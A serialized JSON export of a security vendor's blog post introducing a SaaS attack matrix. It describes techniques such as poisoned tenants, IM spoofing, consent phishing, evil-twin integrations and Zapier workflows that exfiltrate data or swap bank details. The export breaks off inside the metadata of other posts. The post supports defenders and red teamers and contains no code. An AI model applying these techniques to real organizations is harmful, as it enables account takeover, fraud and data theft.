,{},[208316],{"data":208317,"marks":208318,"value":140536,"nodeType":173},{},[],{"data":208320,"content":208321,"nodeType":178},{},[208322],{"data":208323,"marks":208324,"value":140544,"nodeType":173},{},[208325],{"type":13816},{"items":208327},[208328,208330],{"sys":208329,"name":509},{"id":508},{"sys":208331,"name":505},{"id":504},{"items":208333},[208334],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":208335},{"url":8615},{"__typename":1528,"sys":208337,"content":208339,"title":209117,"synopsis":209118,"hashTags":118,"publishedDate":209119,"slug":209120,"tagsCollection":209121,"authorsCollection":209127},{"id":208338},"6VZQJzQ2FNetGNMEjiuXB2",{"json":208340},{"nodeType":165,"data":208341,"content":208342},{},[208343,208350,208357,208364,208371,208378,208385,208391,208408,208415,208458,208465,208472,208512,208532,208539,208546,208553,208573,208591,208598,208631,208638,208657,208664,208671,208701,208721,208728,208733,208740,208747,208754,208761,208768,208775,208782,208789,208796,208803,208810,208817,208833,208840,208909,208916,208923,208952,208967,208974,208981,208988,209021,209041,209048,209055,209062,209069,209088,209105,209111],{"nodeType":178,"data":208344,"content":208345},{},[208346],{"nodeType":173,"value":208347,"marks":208348,"data":208349},"Our goal at Push is simple — to stop identity attacks. Today, the vast majority of identity vulnerabilities exist in the context of SaaS apps. ",[],{},{"nodeType":178,"data":208351,"content":208352},{},[208353],{"nodeType":173,"value":208354,"marks":208355,"data":208356},"The reasons for this are clear: Security teams have reduced central oversight and control over SaaS apps than they are used to, these apps exist in large numbers per company, and the identities that are used to access these apps are... complicated, to say the least. Securing hundreds of apps, with thousands of associated identities, is therefore no mean feat. ",[],{},{"nodeType":178,"data":208358,"content":208359},{},[208360],{"nodeType":173,"value":208361,"marks":208362,"data":208363},"Securing SaaS use means building controls that are easy to use, easy to understand — and ultimately effective. Not just effective against the hand-wavy concept of “SaaS attacks,” but specific techniques — the most common techniques that are likely to cause real damage.",[],{},{"nodeType":178,"data":208365,"content":208366},{},[208367],{"nodeType":173,"value":208368,"marks":208369,"data":208370},"To talk about this, we need to have a shared understanding of what these techniques are. To get that conversation going, we’ve pulled together all the techniques we're aware of, and our research team has even added a bunch of new ones.",[],{},{"nodeType":169,"data":208372,"content":208373},{},[208374],{"nodeType":173,"value":208375,"marks":208376,"data":208377},"The SaaS attack matrix",[],{},{"nodeType":178,"data":208379,"content":208380},{},[208381],{"nodeType":173,"value":208382,"marks":208383,"data":208384},"We’ve taken inspiration from the MITRE ATT&CK framework (certainly intended as the sincerest form of flattery), but wanted to make a conscious break away from the endpoint-focused ATT&CK techniques and instead focus on techniques that are SaaS-specific. In fact, these techniques don’t touch endpoints (so they bypass EDR) or customer networks (so they bypass network detection) — so we’re calling them networkless attacks.",[],{},{"nodeType":312,"data":208386,"content":208390},{"target":208387},{"sys":208388},{"id":208389,"type":317,"linkType":318},"768Zv5gTVHyu5rbzJAzL4F",[],{"nodeType":178,"data":208392,"content":208393},{},[208394,208398,208405],{"nodeType":173,"value":208395,"marks":208396,"data":208397},"You can find more detailed descriptions of these techniques (and hopefully PRs for some we missed) on ",[],{},{"nodeType":186,"data":208399,"content":208400},{"uri":88239},[208401],{"nodeType":173,"value":197982,"marks":208402,"data":208404},[208403],{"type":194},{},{"nodeType":173,"value":1477,"marks":208406,"data":208407},[],{},{"nodeType":178,"data":208409,"content":208410},{},[208411],{"nodeType":173,"value":208412,"marks":208413,"data":208414},"Since we’re not targeting endpoints, let’s talk about the new targets: The accounts/identities on SaaS apps. We found it was useful to think about these identities not as standalone isolated islands — but much more like a graph; less a single web-server on the internet and more like many Windows endpoints on an Active Directory. ",[],{},{"nodeType":178,"data":208416,"content":208417},{},[208418,208422,208430,208433,208442,208446,208454],{"nodeType":173,"value":208419,"marks":208420,"data":208421},"You can leverage this access to an identity on a trusted platform to target (so laterally move or escalate privilege to) other users or identities. For example, attacks like using access to SaaS apps to ",[],{},{"nodeType":186,"data":208423,"content":208424},{"uri":106815},[208425],{"nodeType":173,"value":208426,"marks":208427,"data":208429},"phish other employees through comments",[208428],{"type":194},{},{"nodeType":173,"value":933,"marks":208431,"data":208432},[],{},{"nodeType":186,"data":208434,"content":208436},{"uri":208435},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/im_user_spoofing/description.md",[208437],{"nodeType":173,"value":208438,"marks":208439,"data":208441},"spoofing users on IM platforms",[208440],{"type":194},{},{"nodeType":173,"value":208443,"marks":208444,"data":208445}," to social engineer them there — or perhaps ",[],{},{"nodeType":186,"data":208447,"content":208448},{"uri":162296},[208449],{"nodeType":173,"value":208450,"marks":208451,"data":208453},"backdooring links",[208452],{"type":194},{},{"nodeType":173,"value":208455,"marks":208456,"data":208457}," in documents.",[],{},{"nodeType":178,"data":208459,"content":208460},{},[208461],{"nodeType":173,"value":208462,"marks":208463,"data":208464},"In this case, unusually, it’s not the data in these hundreds of SaaS apps that create risk, and you need to consider low-risk (from a data perspective) apps as a vector to pivot to higher-risk apps in your estate.",[],{},{"nodeType":235,"data":208466,"content":208467},{},[208468],{"nodeType":173,"value":208469,"marks":208470,"data":208471},"Initial access and poisoned tenants",[],{},{"nodeType":178,"data":208473,"content":208474},{},[208475,208479,208486,208489,208496,208500,208508],{"nodeType":173,"value":208476,"marks":208477,"data":208478},"Attacks like ",[],{},{"nodeType":186,"data":208480,"content":208481},{"uri":184680},[208482],{"nodeType":173,"value":182807,"marks":208483,"data":208485},[208484],{"type":194},{},{"nodeType":173,"value":933,"marks":208487,"data":208488},[],{},{"nodeType":186,"data":208490,"content":208491},{"uri":197109},[208492],{"nodeType":173,"value":197114,"marks":208493,"data":208495},[208494],{"type":194},{},{"nodeType":173,"value":208497,"marks":208498,"data":208499}," that get you initial access to SaaS apps are fairly well known — because they work and are widely used. We’re also starting to see tools and attacks that suggest that ",[],{},{"nodeType":186,"data":208501,"content":208502},{"uri":197770},[208503],{"nodeType":173,"value":208504,"marks":208505,"data":208507},"phishing employees through these IM apps",[208506],{"type":194},{},{"nodeType":173,"value":208509,"marks":208510,"data":208511}," is about to go mainstream.",[],{},{"nodeType":178,"data":208513,"content":208514},{},[208515,208519,208528],{"nodeType":173,"value":208516,"marks":208517,"data":208518},"Another interesting attack is a spin on the classic waterhole attack called a ",[],{},{"nodeType":186,"data":208520,"content":208522},{"uri":208521},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/poisoned_tenants/description.md",[208523],{"nodeType":173,"value":208524,"marks":208525,"data":208527},"poisoned tenant",[208526],{"type":194},{},{"nodeType":173,"value":208529,"marks":208530,"data":208531},". Rather than attacking a customer tenant for a SaaS app, the attacker lures employees into joining an attacker-controlled tenant. ",[],{},{"nodeType":178,"data":208533,"content":208534},{},[208535],{"nodeType":173,"value":208536,"marks":208537,"data":208538},"SaaS apps allow anyone to name app tenants (a.k.a. spaces, teams, or instances) anything they like — including your company name. Attackers send invites to your employees from within the app with a customized message explaining why they should join this new tenant (or sign up to the app if they are not already a user). ",[],{},{"nodeType":178,"data":208540,"content":208541},{},[208542],{"nodeType":173,"value":208543,"marks":208544,"data":208545},"Attackers might even pay for premium licenses in the app to further entice employees to join. The attacker then waits for the employee to upload sensitive data or create integrations with other company apps containing crown jewels.",[],{},{"nodeType":235,"data":208547,"content":208548},{},[208549],{"nodeType":173,"value":208550,"marks":208551,"data":208552},"Living-off-the-(SaaS)-land to persist and avoid detection",[],{},{"nodeType":178,"data":208554,"content":208555},{},[208556,208560,208569],{"nodeType":173,"value":208557,"marks":208558,"data":208559},"In the endpoint world, a favorite technique is the use of legit OS utilities or ",[],{},{"nodeType":186,"data":208561,"content":208563},{"uri":208562},"https://lolbas-project.github.io",[208564],{"nodeType":173,"value":208565,"marks":208566,"data":208568},"LOLBaS",[208567],{"type":194},{},{"nodeType":173,"value":208570,"marks":208571,"data":208572}," (Living-Off-the-Land Binaries and Scripts), which are often signed Microsoft utilities. Perhaps the most well-known example is executing scripts through PowerShell rather than building custom malware. That isn’t as useful these days, but there was a time when PowerShell was routinely used to bypass AV, EDR, and even app allow-listing.",[],{},{"nodeType":178,"data":208574,"content":208575},{},[208576,208580,208587],{"nodeType":173,"value":208577,"marks":208578,"data":208579},"In that same living-off-the-land mindset, an attacker trying to maintain access to each SaaS app they compromise using custom OAuth integration apps might instead choose to use legit SaaS apps that specialize in workflow automation to create ",[],{},{"nodeType":186,"data":208581,"content":208582},{"uri":144083},[208583],{"nodeType":173,"value":144086,"marks":208584,"data":208586},[208585],{"type":194},{},{"nodeType":173,"value":208588,"marks":208589,"data":208590},". Utilizing legit SaaS apps also means they can hide in plain sight from incident responders, instead of having to rely on unverified or unpublished integrations.",[],{},{"nodeType":178,"data":208592,"content":208593},{},[208594],{"nodeType":173,"value":208595,"marks":208596,"data":208597},"Perhaps the best example here is using a well-known automation app like Zapier, which claims to have more than 5,000 integrations. These integrations are often verified, approved, and connected to a trusted vendor (Zapier). An attacker might create workflows to:",[],{},{"nodeType":250,"data":208599,"content":208600},{},[208601,208611,208621],{"nodeType":254,"data":208602,"content":208603},{},[208604],{"nodeType":178,"data":208605,"content":208606},{},[208607],{"nodeType":173,"value":208608,"marks":208609,"data":208610},"Do daily data exfiltration from a victim’s data lake.",[],{},{"nodeType":254,"data":208612,"content":208613},{},[208614],{"nodeType":178,"data":208615,"content":208616},{},[208617],{"nodeType":173,"value":208618,"marks":208619,"data":208620},"Configure a webhook that adds malicious accounts to a Github repo on demand.",[],{},{"nodeType":254,"data":208622,"content":208623},{},[208624],{"nodeType":178,"data":208625,"content":208626},{},[208627],{"nodeType":173,"value":208628,"marks":208629,"data":208630},"Automatically find and replace bank account numbers in emails to the finance team.",[],{},{"nodeType":178,"data":208632,"content":208633},{},[208634],{"nodeType":173,"value":208635,"marks":208636,"data":208637},"All appear as legitimate Zapier integrations. But, before you put in alerts specifically for Zapier, know that it’s one of dozens of apps that support these kinds of offensive workflows.",[],{},{"nodeType":178,"data":208639,"content":208640},{},[208641,208645,208653],{"nodeType":173,"value":208642,"marks":208643,"data":208644},"A sneaky attacker might go further and use an ",[],{},{"nodeType":186,"data":208646,"content":208647},{"uri":59335},[208648],{"nodeType":173,"value":208649,"marks":208650,"data":208652},"evil twin integration",[208651],{"type":194},{},{"nodeType":173,"value":208654,"marks":208655,"data":208656}," to make another instance of an existing integration — making this backdoor almost impossible to discover.",[],{},{"nodeType":235,"data":208658,"content":208659},{},[208660],{"nodeType":173,"value":208661,"marks":208662,"data":208663},"Features or vulnerabilities?",[],{},{"nodeType":178,"data":208665,"content":208666},{},[208667],{"nodeType":173,"value":208668,"marks":208669,"data":208670},"When looking for attack techniques, you’re typically going after features that have weaknesses you can abuse rather than bugs in a single app that will be patched. ",[],{},{"nodeType":178,"data":208672,"content":208673},{},[208674,208678,208687,208690,208697],{"nodeType":173,"value":208675,"marks":208676,"data":208677},"It’s pretty common for SaaS apps to skip email verification or allow multiple simultaneous authentication methods. Both of these are conscious design choices in the name of lowering the friction of account creation and reducing customer support. However, these features make techniques like ",[],{},{"nodeType":186,"data":208679,"content":208681},{"uri":208680},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/account_ambushing/description.md",[208682],{"nodeType":173,"value":208683,"marks":208684,"data":208686},"account ambushing",[208685],{"type":194},{},{"nodeType":173,"value":933,"marks":208688,"data":208689},[],{},{"nodeType":186,"data":208691,"content":208692},{"uri":832},[208693],{"nodeType":173,"value":835,"marks":208694,"data":208696},[208695],{"type":194},{},{"nodeType":173,"value":208698,"marks":208699,"data":208700}," possible. If these attacks become widespread, these might come to be seen more as bugs rather than a positive feature for users.",[],{},{"nodeType":178,"data":208702,"content":208703},{},[208704,208708,208717],{"nodeType":173,"value":208705,"marks":208706,"data":208707},"In other cases, the bugs are serious enough and hard enough to patch that they’re worth noting as a technique. The recently disclosed (and perfectly named) ",[],{},{"nodeType":186,"data":208709,"content":208711},{"uri":208710},"https://www.descope.com/blog/post/noauth",[208712],{"nodeType":173,"value":208713,"marks":208714,"data":208716},"nOAuth",[208715],{"type":194},{},{"nodeType":173,"value":208718,"marks":208719,"data":208720}," bug fits this bill. ",[],{},{"nodeType":178,"data":208722,"content":208723},{},[208724],{"nodeType":173,"value":208725,"marks":208726,"data":208727},"The bug arises from a confusion between an email identity and email metadata field in Microsoft integrations and without a central fix from MS (the fix isn’t trivial), these bugs are likely to be discovered and re-occur on third-party OAuth apps for a while to come.",[],{},{"nodeType":312,"data":208729,"content":208732},{"target":208730},{"sys":208731},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":208734,"content":208735},{},[208736],{"nodeType":173,"value":208737,"marks":208738,"data":208739},"The SaaS market is driving these offensive techniques",[],{},{"nodeType":178,"data":208741,"content":208742},{},[208743],{"nodeType":173,"value":208744,"marks":208745,"data":208746},"SaaS apps are basically web apps that are run in the cloud and accessed from endpoints, so then WebApp, endpoint, and cloud security should cover all of SaaS, right? ",[],{},{"nodeType":178,"data":208748,"content":208749},{},[208750],{"nodeType":173,"value":208751,"marks":208752,"data":208753},"That was our assumption when we started, but what we found instead was that SaaS marketing practices are driving a lot of pretty interesting techniques that you don’t run into in standalone web apps.",[],{},{"nodeType":235,"data":208755,"content":208756},{},[208757],{"nodeType":173,"value":208758,"marks":208759,"data":208760},"Modern SaaS is easy to adopt, easy to use, low friction, low cost, low overhead",[],{},{"nodeType":178,"data":208762,"content":208763},{},[208764],{"nodeType":173,"value":208765,"marks":208766,"data":208767},"Making apps easy to sign up for and low effort to support means you need to make some interesting choices when it comes to designing account creation and recovery flows. ",[],{},{"nodeType":178,"data":208769,"content":208770},{},[208771],{"nodeType":173,"value":208772,"marks":208773,"data":208774},"Many apps allow users to sign into apps using multiple methods, easily invite collaborators (internal and external) and avoid any additional friction during the signup process. ",[],{},{"nodeType":178,"data":208776,"content":208777},{},[208778],{"nodeType":173,"value":208779,"marks":208780,"data":208781},"For example, many apps avoid verifying new account email addresses. This is not laziness, these are conscious design choices — not driven by security clearly, but not accidents.",[],{},{"nodeType":235,"data":208783,"content":208784},{},[208785],{"nodeType":173,"value":208786,"marks":208787,"data":208788},"Modern SaaS is highly integrated",[],{},{"nodeType":178,"data":208790,"content":208791},{},[208792],{"nodeType":173,"value":208793,"marks":208794,"data":208795},"Most SaaS apps are trying to build app marketplaces or perform well in other apps' marketplaces (often both), and it’s rare these days to find apps that don’t integrate with other apps. ",[],{},{"nodeType":178,"data":208797,"content":208798},{},[208799],{"nodeType":173,"value":208800,"marks":208801,"data":208802},"OAuth has become the de facto standard protocol for doing this, and most users have become quite used to approving OAuth2.0 consent flows. These integrations have opened up lots of incredibly useful doors for attackers to persist access and move laterally across SaaS apps that few incident response teams have run into yet. These tokens don’t expire when you reset passwords, aren’t protected by MFA, and actions they performed are rarely logged. ",[],{},{"nodeType":178,"data":208804,"content":208805},{},[208806],{"nodeType":173,"value":208807,"marks":208808,"data":208809},"These are not bugs or oversights but rather a consequence of how these APIs are intended to be used (by machines, not human adversaries).",[],{},{"nodeType":169,"data":208811,"content":208812},{},[208813],{"nodeType":173,"value":208814,"marks":208815,"data":208816},"Problems with observing SaaS attacks ",[],{},{"nodeType":178,"data":208818,"content":208819},{},[208820,208824,208829],{"nodeType":173,"value":208821,"marks":208822,"data":208823},"This research begs one question above others: ",[],{},{"nodeType":173,"value":208825,"marks":208826,"data":208828},"“Are we seeing these attacks in the wild?",[208827],{"type":1646},{},{"nodeType":173,"value":208830,"marks":208831,"data":208832},"” ",[],{},{"nodeType":235,"data":208834,"content":208835},{},[208836],{"nodeType":173,"value":208837,"marks":208838,"data":208839},"Yes, definitely",[],{},{"nodeType":178,"data":208841,"content":208842},{},[208843,208847,208856,208859,208868,208872,208881,208884,208892,208896,208905],{"nodeType":173,"value":208844,"marks":208845,"data":208846},"For some of the better-known techniques, like credential stuffing and email phishing, the answer is an easy yes. Stats from ",[],{},{"nodeType":186,"data":208848,"content":208850},{"uri":208849},"https://www.microsoft.com/en-us/security/blog/2023/05/04/how-microsoft-can-help-you-go-passwordless-this-world-password-day/",[208851],{"nodeType":173,"value":208852,"marks":208853,"data":208855},"Microsoft (1,287 password attacks every second)",[208854],{"type":194},{},{"nodeType":173,"value":933,"marks":208857,"data":208858},[],{},{"nodeType":186,"data":208860,"content":208862},{"uri":208861},"https://auth0.com/blog/top-insights-from-our-2022-state-of-secure-identity-report/",[208863],{"nodeType":173,"value":208864,"marks":208865,"data":208867},"Auth0 (a third of their traffic is credential stuffing)",[208866],{"type":194},{},{"nodeType":173,"value":208869,"marks":208870,"data":208871}," speaks volumes. Other sources like the ",[],{},{"nodeType":186,"data":208873,"content":208875},{"uri":208874},"https://www.gov.uk/government/statistics/cyber-security-breaches-survey-2022/cyber-security-breaches-survey-2022",[208876],{"nodeType":173,"value":208877,"marks":208878,"data":208880},"NCSC's Cyber Security Breaches Survey 2022",[208879],{"type":194},{},{"nodeType":173,"value":73790,"marks":208882,"data":208883},[],{},{"nodeType":186,"data":208885,"content":208886},{"uri":1297},[208887],{"nodeType":173,"value":208888,"marks":208889,"data":208891},"Verizon 2023 Data Breach Investigations Report",[208890],{"type":194},{},{"nodeType":173,"value":208893,"marks":208894,"data":208895}," suggest that phishing is also a major cause of SaaS breaches. Anecdotal reports from colleagues in the Incident Response field suggest that malicious mail forwarding rules are seen a lot, something which is supported by the ",[],{},{"nodeType":186,"data":208897,"content":208899},{"uri":208898},"https://expel.com/expel-quarterly-threat-report/",[208900],{"nodeType":173,"value":208901,"marks":208902,"data":208904},"Expel Quarterly Threat Report for Q1 2023",[208903],{"type":194},{},{"nodeType":173,"value":208906,"marks":208907,"data":208908}," (see page 6).",[],{},{"nodeType":178,"data":208910,"content":208911},{},[208912],{"nodeType":173,"value":208913,"marks":208914,"data":208915},"The takeaway is that the current focus for defenders should be to ensure users have good phishing-resistant account security in place — make sure you have basics like strong unique passwords and MFA in place across your entire SaaS estate.",[],{},{"nodeType":235,"data":208917,"content":208918},{},[208919],{"nodeType":173,"value":208920,"marks":208921,"data":208922},"For newer OAuth attacks, it’s a lot less clear …",[],{},{"nodeType":178,"data":208924,"content":208925},{},[208926,208930,208935,208939,208948],{"nodeType":173,"value":208927,"marks":208928,"data":208929},"Other techniques like consent phishing have been discussed in some breach disclosures like the ",[],{},{"nodeType":173,"value":208931,"marks":208932,"data":208934},"2020 SANS breach",[208933],{"type":194},{},{"nodeType":173,"value":208936,"marks":208937,"data":208938},". These OAuth techniques also pop up in the news (for example, the ",[],{},{"nodeType":186,"data":208940,"content":208942},{"uri":208941},"https://www.bleepingcomputer.com/news/security/github-how-stolen-oauth-tokens-helped-breach-dozens-of-orgs/",[208943],{"nodeType":173,"value":208944,"marks":208945,"data":208947},"2022 Github/Heroku/Travis-CI breach",[208946],{"type":194},{},{"nodeType":173,"value":208949,"marks":208950,"data":208951}," where GitHub accounts were breached using stolen Heroku and Travis-CI OAuth tokens). ",[],{},{"nodeType":178,"data":208953,"content":208954},{},[208955,208959,208964],{"nodeType":173,"value":208956,"marks":208957,"data":208958},"That said, none of these techniques come up as frequently as their usefulness would suggest. This means one of two things: ",[],{},{"nodeType":173,"value":208960,"marks":208961,"data":208963},"Either attackers aren’t yet using them widely, or they are and we aren’t detecting them",[208962],{"type":1646},{},{"nodeType":173,"value":1477,"marks":208965,"data":208966},[],{},{"nodeType":178,"data":208968,"content":208969},{},[208970],{"nodeType":173,"value":208971,"marks":208972,"data":208973},"There is certainly a case to be made that attackers simply don’t need these newer techniques yet. Many organizations don’t have a way of discovering SaaS use in their organization yet, never mind breached accounts, so new persistence techniques might be a bit more than necessary at the moment.",[],{},{"nodeType":235,"data":208975,"content":208976},{},[208977],{"nodeType":173,"value":208978,"marks":208979,"data":208980},"But would we know if it was happening?",[],{},{"nodeType":178,"data":208982,"content":208983},{},[208984],{"nodeType":173,"value":208985,"marks":208986,"data":208987},"On the other hand, there is certainly the possibility that these attacks are increasingly used, but are simply not being discovered. A strong argument in favor of this view is the difficulty in investigating these attacks. Very few SaaS apps provide enough logging capability to discover these attacks as a customer. This is true even for the biggest, most mature apps like Office 365 and Google Workspace unless you are on top license tiers. This is doubly true for attacks that use OAuth, with many apps providing no insight or details into actions made using OAuth-authenticated APIs. ",[],{},{"nodeType":178,"data":208989,"content":208990},{},[208991,208995,209004,209008,209017],{"nodeType":173,"value":208992,"marks":208993,"data":208994},"This suggests only the SaaS providers for these apps are really in a position to discover and investigate them. This does ring true when you consider that ",[],{},{"nodeType":186,"data":208996,"content":208998},{"uri":208997},"https://blog.heroku.com/april-2022-incident-review",[208999],{"nodeType":173,"value":209000,"marks":209001,"data":209003},"Heroku",[209002],{"type":194},{},{"nodeType":173,"value":209005,"marks":209006,"data":209007}," relied heavily on Github during the investigation (and in one case even the detection of) their 2022 breaches, and the same seems true for a similar breach affecting ",[],{},{"nodeType":186,"data":209009,"content":209011},{"uri":209010},"https://circleci.com/blog/jan-4-2023-incident-report/",[209012],{"nodeType":173,"value":209013,"marks":209014,"data":209016},"CircleCI",[209015],{"type":194},{},{"nodeType":173,"value":209018,"marks":209019,"data":209020}," later that year. Github and CircleCI’s customers prompted the investigation after seeing strange behavior, but Github had access to the logs to investigate. It’s difficult to imagine that most or even many SaaS vendors have the resources or inclination to run these investigations effectively as GitHub appears to have.",[],{},{"nodeType":178,"data":209022,"content":209023},{},[209024,209028,209038],{"nodeType":173,"value":209025,"marks":209026,"data":209027},"So, are these attacks happening in the real world? My best guess is it’s a little bit of column A and a little bit of column B — there are likely not so many of these attacks happening yet, and when they do, I suspect the vast majority go undetected. ",[],{},{"nodeType":186,"data":209029,"content":209031},{"uri":209030},"https://www.youtube.com/watch?v=j95kNwZw8YY",[209032],{"nodeType":173,"value":209033,"marks":209034,"data":209037},"But that’s just like my opinion, man.",[209035,209036],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":209039,"data":209040},[],{},{"nodeType":178,"data":209042,"content":209043},{},[209044],{"nodeType":173,"value":209045,"marks":209046,"data":209047},"This is part of the reason we think enabling red teamers to try these techniques in anger is useful — this is the time-proven way to understand these risks.",[],{},{"nodeType":169,"data":209049,"content":209050},{},[209051],{"nodeType":173,"value":209052,"marks":209053,"data":209054},"What’s next?",[],{},{"nodeType":178,"data":209056,"content":209057},{},[209058],{"nodeType":173,"value":209059,"marks":209060,"data":209061},"We’ve barely scratched the surface, but perhaps there is enough here to get the discussion going. From past experience, discussion may not be enough, and it’s likely that live offensive work like penetration tests or more likely red team exercises will be required to make the risks of using these techniques real for the wider security community. ",[],{},{"nodeType":178,"data":209063,"content":209064},{},[209065],{"nodeType":173,"value":209066,"marks":209067,"data":209068},"After all, seeing is believing. We think some more practical examples and tools to help red  teamers use these techniques on engagements will help drive awareness forward, so we’ll be looking to build out this content.",[],{},{"nodeType":178,"data":209070,"content":209071},{},[209072,209076,209085],{"nodeType":173,"value":209073,"marks":209074,"data":209075},"We’ve started with pure networkless attacks that don’t touch customer networks or endpoints, but there are many useful techniques to connect the old endpoint world to the SaaS world. Consider stealing OAuth tokens from a thick client on an endpoint, or using a ",[],{},{"nodeType":186,"data":209077,"content":209079},{"uri":209078},"https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/",[209080],{"nodeType":173,"value":209081,"marks":209082,"data":209084},"backdoored GitHub repo to get code execution on endpoints",[209083],{"type":194},{},{"nodeType":173,"value":1477,"marks":209086,"data":209087},[],{},{"nodeType":178,"data":209089,"content":209090},{},[209091,209095,209102],{"nodeType":173,"value":209092,"marks":209093,"data":209094},"Help us all better understand how widespread these attacks are by sharing some war stories. We’d love some comments, discussions, or PRs on ",[],{},{"nodeType":186,"data":209096,"content":209097},{"uri":88239},[209098],{"nodeType":173,"value":197982,"marks":209099,"data":209101},[209100],{"type":194},{},{"nodeType":173,"value":197986,"marks":209103,"data":209104},[],{},{"nodeType":312,"data":209106,"content":209110},{"target":209107},{"sys":209108},{"id":209109,"type":317,"linkType":318},"2y0INxqAi594O7rCAVKhTI",[],{"nodeType":178,"data":209112,"content":209113},{},[209114],{"nodeType":173,"value":37,"marks":209115,"data":209116},[],{},"Let’s talk about SaaS attack techniques","Offensive security drives defensive security. We're sharing a collection of SaaS attack techniques to help defenders understand the threats they face.","2023-07-27T00:00:00.000Z","saas-attack-techniques",{"items":209122},[209123,209125],{"sys":209124,"name":505},{"id":504},{"sys":209126,"name":509},{"id":508},{"items":209128},[209129],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":209130},{"url":13981},"content:blog:how-to-prevent-account-takeover-with-push.json","blog/how-to-prevent-account-takeover-with-push.json","blog/how-to-prevent-account-takeover-with-push",{"_path":209135,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":209136,"ogImage":118,"summary":209139,"title":209150,"subtitle":118,"metaTitle":209151,"synopsis":209152,"hashTags":118,"publishedDate":209153,"slug":209154,"tagsCollection":209155,"relatedBlogPostsCollection":209161,"authorsCollection":210909,"content":210913,"_id":211317,"_type":5439,"_source":5440,"_file":211318,"_stem":211319,"_extension":5439},"/blog/introducing-cloned-login-page-detection",{"id":209137,"publishedAt":209138},"1Qj0EC6Tn04lPMOoW7P5oR","2026-01-30T09:10:09.983Z",{"json":209140},{"data":209141,"content":209142,"nodeType":165},{},[209143],{"data":209144,"content":209145,"nodeType":178},{},[209146],{"data":209147,"marks":209148,"value":209149,"nodeType":173},{},[],"Cloned login page detection adds yet another layer of defense to Push's cutting-edge phishing prevention capabilities, giving security teams the tools they need to protect workforce identities and shut down phishing attacks.","Adding cloned login page detection to your phishing defense arsenal","Detect cloned login pages used in phishing attacks","We've added cloned login page detection, providing yet another layer of protection against phishing attacks.\n","2024-08-14T00:00:00.000Z","introducing-cloned-login-page-detection",{"items":209156},[209157,209159],{"sys":209158,"name":505},{"id":504},{"sys":209160,"name":18399},{"id":18398},{"items":209162},[209163,209653,210220],{"__typename":1528,"sys":209164,"content":209165,"title":140545,"synopsis":140546,"hashTags":118,"publishedDate":140547,"slug":140548,"tagsCollection":209643,"authorsCollection":209649},{"id":139982},{"json":209166},{"data":209167,"content":209168,"nodeType":165},{},[209169,209185,209201,209207,209212,209218,209224,209230,209236,209243,209259,209265,209271,209277,209282,209288,209314,209320,209326,209332,209338,209343,209349,209355,209361,209387,209392,209398,209404,209430,209435,209441,209447,209453,209459,209464,209469,209475,209481,209487,209492,209498,209504,209510,209516,209532,209545,209551,209557,209563,209568,209574,209590,209595,209601,209624,209630,209636],{"data":209170,"content":209171,"nodeType":178},{},[209172,209175,209182],{"data":209173,"marks":209174,"value":139993,"nodeType":173},{},[],{"data":209176,"content":209177,"nodeType":186},{"uri":118063},[209178],{"data":209179,"marks":209180,"value":140001,"nodeType":173},{},[209181],{"type":194},{"data":209183,"marks":209184,"value":140005,"nodeType":173},{},[],{"data":209186,"content":209187,"nodeType":178},{},[209188,209191,209198],{"data":209189,"marks":209190,"value":140012,"nodeType":173},{},[],{"data":209192,"content":209193,"nodeType":186},{"uri":49844},[209194],{"data":209195,"marks":209196,"value":140020,"nodeType":173},{},[209197],{"type":194},{"data":209199,"marks":209200,"value":140024,"nodeType":173},{},[],{"data":209202,"content":209203,"nodeType":178},{},[209204],{"data":209205,"marks":209206,"value":140031,"nodeType":173},{},[],{"data":209208,"content":209211,"nodeType":312},{"target":209209},{"sys":209210},{"id":140036,"type":317,"linkType":318},[],{"data":209213,"content":209214,"nodeType":178},{},[209215],{"data":209216,"marks":209217,"value":140044,"nodeType":173},{},[],{"data":209219,"content":209220,"nodeType":169},{},[209221],{"data":209222,"marks":209223,"value":140051,"nodeType":173},{},[],{"data":209225,"content":209226,"nodeType":178},{},[209227],{"data":209228,"marks":209229,"value":140058,"nodeType":173},{},[],{"data":209231,"content":209232,"nodeType":178},{},[209233],{"data":209234,"marks":209235,"value":140065,"nodeType":173},{},[],{"data":209237,"content":209238,"nodeType":178},{},[209239],{"data":209240,"marks":209241,"value":140073,"nodeType":173},{},[209242],{"type":13816},{"data":209244,"content":209245,"nodeType":178},{},[209246,209249,209256],{"data":209247,"marks":209248,"value":140080,"nodeType":173},{},[],{"data":209250,"content":209251,"nodeType":186},{"uri":140083},[209252],{"data":209253,"marks":209254,"value":140089,"nodeType":173},{},[209255],{"type":194},{"data":209257,"marks":209258,"value":1477,"nodeType":173},{},[],{"data":209260,"content":209261,"nodeType":169},{},[209262],{"data":209263,"marks":209264,"value":140099,"nodeType":173},{},[],{"data":209266,"content":209267,"nodeType":178},{},[209268],{"data":209269,"marks":209270,"value":140106,"nodeType":173},{},[],{"data":209272,"content":209273,"nodeType":178},{},[209274],{"data":209275,"marks":209276,"value":140113,"nodeType":173},{},[],{"data":209278,"content":209281,"nodeType":312},{"target":209279},{"sys":209280},{"id":129117,"type":317,"linkType":318},[],{"data":209283,"content":209284,"nodeType":178},{},[209285],{"data":209286,"marks":209287,"value":140125,"nodeType":173},{},[],{"data":209289,"content":209290,"nodeType":178},{},[209291,209294,209301,209304,209311],{"data":209292,"marks":209293,"value":140132,"nodeType":173},{},[],{"data":209295,"content":209296,"nodeType":186},{"uri":140135},[209297],{"data":209298,"marks":209299,"value":140141,"nodeType":173},{},[209300],{"type":194},{"data":209302,"marks":209303,"value":140145,"nodeType":173},{},[],{"data":209305,"content":209306,"nodeType":186},{"uri":140148},[209307],{"data":209308,"marks":209309,"value":140154,"nodeType":173},{},[209310],{"type":194},{"data":209312,"marks":209313,"value":2340,"nodeType":173},{},[],{"data":209315,"content":209316,"nodeType":169},{},[209317],{"data":209318,"marks":209319,"value":140164,"nodeType":173},{},[],{"data":209321,"content":209322,"nodeType":178},{},[209323],{"data":209324,"marks":209325,"value":140171,"nodeType":173},{},[],{"data":209327,"content":209328,"nodeType":178},{},[209329],{"data":209330,"marks":209331,"value":140178,"nodeType":173},{},[],{"data":209333,"content":209334,"nodeType":17